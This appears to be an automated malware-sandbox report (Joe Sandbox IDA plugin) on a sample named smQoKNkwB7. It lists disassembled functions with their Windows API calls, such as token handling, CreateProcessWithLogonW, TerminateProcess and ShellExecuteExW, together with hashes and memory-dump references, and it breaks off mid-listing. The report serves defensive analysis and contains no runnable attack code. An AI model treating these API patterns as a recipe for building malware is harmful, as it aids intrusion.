API String ID: 3172280962-24824748
Opcode ID: efe8d3e8bc0ded4e2d582da325c7df6c7573b3bc828c3da6e9505b9e51eca790
Instruction ID: 6011796869cc342d44835254126770091a83dfead9212c1814fd9b6a5c9265f2
Opcode Fuzzy Hash: efe8d3e8bc0ded4e2d582da325c7df6c7573b3bc828c3da6e9505b9e51eca790
Instruction Fuzzy Hash: 14D16270618B119FC714DF25C494A2EBBE1EF89325F14885DF88A9B361DB31EC49CB92

Function 0024175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00240FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00240FCA
Part of subcall function 00240FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00240FD6
Part of subcall function 00240FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00240FE5
Part of subcall function 00240FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00240FEC
Part of subcall function 00240FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00241002

GetLengthSid.ADVAPI32(?,00000000,00241335), ref: 002417AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 002417BA
HeapAlloc.KERNEL32(00000000), ref: 002417C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 002417DA
GetProcessHeap.KERNEL32(00000000,00000000,00241335), ref: 002417EE
HeapFree.KERNEL32(00000000), ref: 002417F5

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 23a8cc9c1d5bce006adb5af76f450e614c2450379bcc5a2af1097d02458729f0
Instruction ID: 9704722632d0ffbcc8f1f0132a2c012a00e9b9dba7c1676fa019e43345312876
Opcode Fuzzy Hash: 23a8cc9c1d5bce006adb5af76f450e614c2450379bcc5a2af1097d02458729f0
Instruction Fuzzy Hash: 16118E31520206FFDB189FA4DC89BAEBBB9EB45355F204028F4499B210D735A9A4CB60

Function 002414CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002414FF
OpenProcessToken.ADVAPI32(00000000), ref: 00241506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00241515
CloseHandle.KERNEL32(00000004), ref: 00241520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0024154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00241563

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 4ef3c6080da498994f6e17e97a0294e0ccd7900113b31ad577b9baa0368d68e2
Instruction ID: 3b7f1d7eb96bf07a1785778239daabe8efdecdbc4cac222dadcf6b4e7f32368d
Opcode Fuzzy Hash: 4ef3c6080da498994f6e17e97a0294e0ccd7900113b31ad577b9baa0368d68e2
Instruction Fuzzy Hash: D3113A7250120EEBDF159FA8ED49FDE7BA9EF48744F144059FA09A2060C375CEA0DB60

Function 00203382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00203379,00202FE5), ref: 00203390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0020339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002033B7
SetLastError.KERNEL32(00000000,?,00203379,00202FE5), ref: 00203409

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e1bc5fb2355e067543118f156061018f3c41c0e174e8706924a06d71b92a6a2e
Instruction ID: 3226230621407ad8c418700aec0951143ca2ce484f8c3e7ec291b9e5185d4a09
Opcode Fuzzy Hash: e1bc5fb2355e067543118f156061018f3c41c0e174e8706924a06d71b92a6a2e
Instruction Fuzzy Hash: 8A012832238312BFE7146B747CC95672A9CDB063753300269F510841F3FF224D715984

Function 00212D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00215686,00223CD6,?,00000000,?,00215B6A,?,?,?,?,?,0020E6D1,?,002A8A48), ref: 00212D78
_free.LIBCMT ref: 00212DAB
_free.LIBCMT ref: 00212DD3
SetLastError.KERNEL32(00000000,?,?,?,?,0020E6D1,?,002A8A48,00000010,001E4F4A,?,?,00000000,00223CD6), ref: 00212DE0
SetLastError.KERNEL32(00000000,?,?,?,?,0020E6D1,?,002A8A48,00000010,001E4F4A,?,?,00000000,00223CD6), ref: 00212DEC
_abort.LIBCMT ref: 00212DF2

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 6e851da56fb9051dc44b120c3e4a8395260064d88335fa98a325d74f8b0fb848
Instruction ID: a7343a9f824b449d9d3af3277669f5720f847aa8c0f7f5d838f13957831c0d4c
Opcode Fuzzy Hash: 6e851da56fb9051dc44b120c3e4a8395260064d88335fa98a325d74f8b0fb848
Instruction Fuzzy Hash: 64F0A931564502EBC6227B38FC0AEDA15D5ABE27B1B35041CF82C921D5EE348CF94560

Function 00278A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 001F9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001F9693
Part of subcall function 001F9639: SelectObject.GDI32(?,00000000), ref: 001F96A2
Part of subcall function 001F9639: BeginPath.GDI32(?), ref: 001F96B9
Part of subcall function 001F9639: SelectObject.GDI32(?,00000000), ref: 001F96E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00278A4E
LineTo.GDI32(?,00000003,00000000), ref: 00278A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00278A70
LineTo.GDI32(?,00000000,00000003), ref: 00278A80
EndPath.GDI32(?), ref: 00278A90
StrokePath.GDI32(?), ref: 00278AA0

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 4f3cc5f3139d53ae91ed538308d46434fd471026bcecf0f83a695f16c5fb24c8
Instruction ID: eacecea16dfe1e93f11b9bff0127949b073f9736022847e061ad798a825349c4
Opcode Fuzzy Hash: 4f3cc5f3139d53ae91ed538308d46434fd471026bcecf0f83a695f16c5fb24c8
Instruction Fuzzy Hash: 03110C7604014DFFDB119F90EC4CEAA7F6DEB04350F108015BA1995161C7719D95DBA0

Function 002451FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00245218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00245229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00245230
ReleaseDC.USER32(00000000,00000000), ref: 00245238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0024524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00245261

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 5974b3791541a33eab2f8ffcf7aea4ff5a6129d186b2899007b87b635afd79ae
Instruction ID: 05354142796e3f4e02c3281e845563e389c67fe4ab77ae978e11cc8f156b5bd1
Opcode Fuzzy Hash: 5974b3791541a33eab2f8ffcf7aea4ff5a6129d186b2899007b87b635afd79ae
Instruction Fuzzy Hash: EB016775E00715BBEB109FB59C49E5EBFB8EF44751F144065FA08A7281D6709C10CFA0

Function 001E1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 001E1BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 001E1BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 001E1C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 001E1C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 001E1C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 001E1C22

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 95eadea90eca87fff4b37bf6a231a3e260c77908ab92715fa1b9b1161b570828
Instruction ID: b054f1e66eb2e7c75201e6fc6602d5609b279c9ecf284e66120bd462527cba89
Opcode Fuzzy Hash: 95eadea90eca87fff4b37bf6a231a3e260c77908ab92715fa1b9b1161b570828
Instruction Fuzzy Hash: 69016CB09027597DE3008F6A8C85B52FFA8FF59754F00411F915C47941C7F5A864CBE5

Function 0024EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0024EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0024EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0024EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0024EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0024EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0024EB75

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 0ef825ea744dfd352d3fd44cc7df0844d45fa5a1e2d0d8384b3137371b0e181d
Instruction ID: 91df6d4f8846afc6aa1ca54580e3edee3baf780c9a8395fb44686667b3c0764d
Opcode Fuzzy Hash: 0ef825ea744dfd352d3fd44cc7df0844d45fa5a1e2d0d8384b3137371b0e181d
Instruction Fuzzy Hash: A4F03A72241559BBE7215B62AC4EEEF3A7CEFCAB11F10016CF609E1091D7A05A41CAB5

Function 00237439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00237452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00237469
GetWindowDC.USER32(?), ref: 00237475
GetPixel.GDI32(00000000,?,?), ref: 00237484
ReleaseDC.USER32(?,00000000), ref: 00237496
GetSysColor.USER32(00000005), ref: 002374B0

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: fc927c637a91fa1a91c15ca6763d019bc8751d489e3d8d0a4a9b63b4fa0218e8
Instruction ID: 3a1f0b048c7e0d0ca2ff31f499575abbbeb9a8d36587addddeab0b5e4c05a2bf
Opcode Fuzzy Hash: fc927c637a91fa1a91c15ca6763d019bc8751d489e3d8d0a4a9b63b4fa0218e8
Instruction Fuzzy Hash: 7A016D71414219EFDB616F74EC0CBAA7BB5FF44311F650168FA1AA21A1CB312E91EB50

Function 00241874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0024187F
UnloadUserProfile.USERENV(?,?), ref: 0024188B
CloseHandle.KERNEL32(?), ref: 00241894
CloseHandle.KERNEL32(?), ref: 0024189C
GetProcessHeap.KERNEL32(00000000,?), ref: 002418A5
HeapFree.KERNEL32(00000000), ref: 002418AC

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: bec7a94e58c13132e516d388615d111db4292f1ba3f85a70e8bcc7c3aa7048e5
Instruction ID: c55a73d0e267144ac6e2adbda5532e931647ad309c39c55e0ad706a7e9fcaa06
Opcode Fuzzy Hash: bec7a94e58c13132e516d388615d111db4292f1ba3f85a70e8bcc7c3aa7048e5
Instruction Fuzzy Hash: 3CE05276104506BBEB016BB5FD0C94ABB69FB49B22B608639F22D91471CB3294A1DB50

Function 001EBBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001EBEB3

Strings

D%+, xrefs: 001EBCA2
D%+, xrefs: 001EBDED, 001EBD91, 001EBD1B
D%+, xrefs: 001EBE9A
D%+D%+, xrefs: 001EBCA5

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%+$D%+$D%+$D%+D%+
API String ID: 1385522511-4078072316
Opcode ID: 8311cb827c6202ee1385d23af2e762eb85410978137d4c1492cfa9e524e5c2f1
Instruction ID: 6a244e09194c03cdf1c4bef182ab74059298ea9a3ab07a93ce1dafc493bf5e8b
Opcode Fuzzy Hash: 8311cb827c6202ee1385d23af2e762eb85410978137d4c1492cfa9e524e5c2f1
Instruction Fuzzy Hash: DD915975A08A4ACFCB18CF9AC4D06AEB7F1FF58314F24816AD945AB351D731AD81CB90

Function 00267B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00200242: EnterCriticalSection.KERNEL32(002B070C,002B1884,?,?,001F198B,002B2518,?,?,?,001E12F9,00000000), ref: 0020024D
Part of subcall function 00200242: LeaveCriticalSection.KERNEL32(002B070C,?,001F198B,002B2518,?,?,?,001E12F9,00000000), ref: 0020028A

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

Part of subcall function 002000A3: __onexit.LIBCMT ref: 002000A9

__Init_thread_footer.LIBCMT ref: 00267BFB

Part of subcall function 002001F8: EnterCriticalSection.KERNEL32(002B070C,?,?,001F8747,002B2514), ref: 00200202
Part of subcall function 002001F8: LeaveCriticalSection.KERNEL32(002B070C,?,001F8747,002B2514), ref: 00200235

Strings

G, xrefs: 00267C7F
5, xrefs: 00267C78
+T#, xrefs: 00267E2E
Variable must be of type 'Object'., xrefs: 00267C3A

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: +T#$5$G$Variable must be of type 'Object'.
API String ID: 535116098-3608813932
Opcode ID: bd1c577e1b325bb4b26a5073395370657e5335c9c282edac10bb4b4cc29e86c1
Instruction ID: fae8d92b5f472e8f20f2ff099e126c3a0e11cc6d406838ce638c4af72deeb214
Opcode Fuzzy Hash: bd1c577e1b325bb4b26a5073395370657e5335c9c282edac10bb4b4cc29e86c1
Instruction Fuzzy Hash: AE91AE70A24209EFCB14EF54E881DBDB7B1FF49308F508459F8069B292DB71AEA5CB51

Function 0024C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001E7620: _wcslen.LIBCMT ref: 001E7625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0024C6EE
_wcslen.LIBCMT ref: 0024C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0024C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0024C7CA

Strings

0, xrefs: 0024C6AF

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 3af3dca4bbeb7f24c5a7a808bf48922cf8522b6859362c48612e5de40ca52e6f
Instruction ID: 3873f11aee4e533d84910c42d828664d095b8bc883f1dc34c5e55fd58d002a8f
Opcode Fuzzy Hash: 3af3dca4bbeb7f24c5a7a808bf48922cf8522b6859362c48612e5de40ca52e6f
Instruction Fuzzy Hash: 3F5113716263029BD7989F2CC884B6BB7E8AF85314F240A2DF595D31E1DB70D824CF52

Function 0026AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0026AEA3

Part of subcall function 001E7620: _wcslen.LIBCMT ref: 001E7625

GetProcessId.KERNEL32(00000000), ref: 0026AF38
CloseHandle.KERNEL32(00000000), ref: 0026AF67

Strings

<, xrefs: 0026AE6B
@, xrefs: 0026AE72

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: a4f2dcb3aed69a83e1856ab5ed4a818a098f5e24bb0925145dc7f4453372aff9
Instruction ID: 2000cf8d5815d2cbb7b77115073832d653fcc8cf483ceea09c74c2547f204092
Opcode Fuzzy Hash: a4f2dcb3aed69a83e1856ab5ed4a818a098f5e24bb0925145dc7f4453372aff9
Instruction Fuzzy Hash: 53717870A10A59DFCB14DF65D484A9EBBF0BF08304F1484A9E816AB392C771ED95CF91

Function 0024719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00247206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0024723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0024724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002472CF

Strings

DllGetClassObject, xrefs: 00247242

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 747d8c71fe9305b8acbf8c7cc1f258624bc6eb7e8a4f87a4660abab51cc0a708
Instruction ID: 9d52515709f1ee838c75a29bfc7f3e5f63e84bd77b654f9c04eda5de464b5bbe
Opcode Fuzzy Hash: 747d8c71fe9305b8acbf8c7cc1f258624bc6eb7e8a4f87a4660abab51cc0a708
Instruction Fuzzy Hash: F1416F71A14205EFDB19CF64C884A9A7BB9EF45310F2480AEFD199F20AD7F1D954CBA0

Function 00272F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00272F8D
LoadLibraryW.KERNEL32(?), ref: 00272F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00272FA9
DestroyWindow.USER32(?), ref: 00272FB1

Strings

SysAnimate32, xrefs: 00272F68

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
